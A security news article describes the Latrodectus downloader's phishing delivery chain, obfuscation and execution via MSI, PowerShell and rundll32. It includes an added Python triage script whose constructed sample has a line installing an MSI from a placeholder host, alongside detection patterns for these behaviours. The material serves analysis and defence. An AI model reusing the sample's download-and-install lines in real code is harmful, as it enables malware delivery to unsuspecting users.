Latrodectus Malware Increasingly Used by Cybercriminals


The Latrodectus malware has been increasingly used by cybercriminals, with recent campaigns targeting the financial, automotive and healthcare sectors, according to a Forcepoint analysis. 

Latrodectus (aka BlackWidow) is a downloader first detected in October 2023. It is thought to have been developed by LunarSpider, a threat actor who developed IcedID (aka BokBot) and who has been associated with WizardSpider (by CrowdStrike). 

The malware is primarily delivered by email phishing attachments, either in PDF or HTML format, that result in infection. Successful installation of the malware can lead to PII exfiltration, financial loss through fraud or extortion, and the compromise of sensitive information.

The attack is delivered via a compromised email that contains the delivery method disguised either as a DocuSign request in the PDF delivery variant, or as a ‘failed display’ popup in the HTML variant. If the victim clicks the link to access the attached document, obfuscated JavaScript downloads a DLL that results in the installation of the Latrodectus backdoor.

The primary difference between the attackers’ PDF and HTML delivery is that the former uses an MSI installer downloaded by the JavaScript, while the latter attempts to use PowerShell to install the DLL directly. 

The malicious code is obfuscated within the attachment's JavaScript by padding it with a large quantity of junk comment lines. The genuine code lines, scattered among the meaningless ones, are marked by additional leading '/' characters. Stripping the junk lines leaves the actual malicious code. In the PDF variant, this code creates an ActiveXObject("WindowsInstaller.Installer") and downloads a .msi installer file.
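As an added analysis example (not code from the Forcepoint report or the malware itself), the following Python script recovers the hidden statements from a JavaScript attachment padded in the way described above and flags the indicators an analyst would look for. The sample script is constructed; the assumption that junk lines start with "//" and genuine lines with "////" is an illustration of "additional leading '/' characters", not a confirmed marker, so adjust MARKER to match a real sample.

```python
import re

# Constructed sample mimicking the obfuscation the article describes:
# junk "//" comment lines with the real statements hidden among them,
# marked by extra leading slashes. The "////" marker is an assumption.
SAMPLE = """\
// lorem ipsum dolor sit amet
////var inst = new ActiveXObject("WindowsInstaller.Installer");
// consectetur adipiscing elit
// sed do eiusmod tempor incididunt
////inst.UILevel = 2;
// ut labore et dolore magna aliqua
////inst.InstallProduct("https://example.invalid/placeholder.msi");
// quis nostrud exercitation
"""

MARKER = "////"

# Behaviours named in the article, expressed as detection patterns.
SUSPICIOUS = {
    "windows_installer_activex": re.compile(
        r'ActiveXObject\(\s*["\']WindowsInstaller\.Installer["\']', re.I),
    "msi_download": re.compile(r'InstallProduct|\.msi\b', re.I),
    "rundll32": re.compile(r'rundll32', re.I),
    "powershell": re.compile(r'powershell', re.I),
}


def strip_junk(script: str, marker: str = MARKER) -> list[str]:
    """Return the hidden statements: lines that begin with the marker,
    with the marker removed. Every other line is treated as junk."""
    recovered = []
    for line in script.splitlines():
        stripped = line.lstrip()
        if stripped.startswith(marker):
            recovered.append(stripped[len(marker):].strip())
    return recovered


def triage(script: str, marker: str = MARKER) -> dict:
    """Recover the code, match it against the indicator patterns and report
    the junk-to-code ratio, which is itself a useful heuristic signal."""
    code = strip_junk(script, marker)
    total = len([l for l in script.splitlines() if l.strip()])
    hits = sorted(name for name, rx in SUSPICIOUS.items()
                  if any(rx.search(line) for line in code))
    return {
        "recovered_lines": code,
        "indicators": hits,
        "junk_ratio": round((total - len(code)) / total, 2) if total else 0.0,
    }
```

Run `triage(SAMPLE)` on a real attachment's text to get the recovered statements and the list of matched indicators, or integrate the patterns into a mail-gateway or sandbox rule.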

The MSI file is run by the JavaScript, dropping a malicious DLL which is then run by rundll32.exe. The end result is another DLL payload unpacked in memory. It is this that connects to the C2 server via the somewhat unusual port 8041.

In the HTML delivery method, trying to access the file attachment causes a fake Windows popup. It claims the browser being used doesn’t support ‘correct offline display’ – but this can be solved by clicking a (fake) ‘Solution’ button. The JavaScript causing this is obfuscated by the text message being stored in reverse order.

Clicking the attackers' so-called 'Solution' button in fact downloads and installs Latrodectus without the victim's knowledge. In this variant the JavaScript attempts to use PowerShell to download the malicious DLL payload directly and execute it with rundll32.exe, without resorting to an MSI installer.


“Threat actors continue to use older emails to target users via suspicious PDF or HTML attachments,” write the researchers in a Forcepoint analysis. “They use a redirection method with URL shorteners and host malicious payloads on well-known storage[.]googleapis[.]com hosting projects.”

The Forcepoint analysis also includes IoCs comprising lists of known C2 domains and initial stage URLs associated with the Latrodectus phishing.

Related: Be Aware of These Eight Underrated Phishing Techniques

Related: Ukrainian Sentenced to Prison in US for Role in Zeus, IcedID Malware Operations

Related: IcedID Trojan Operators Experimenting With New Delivery Methods
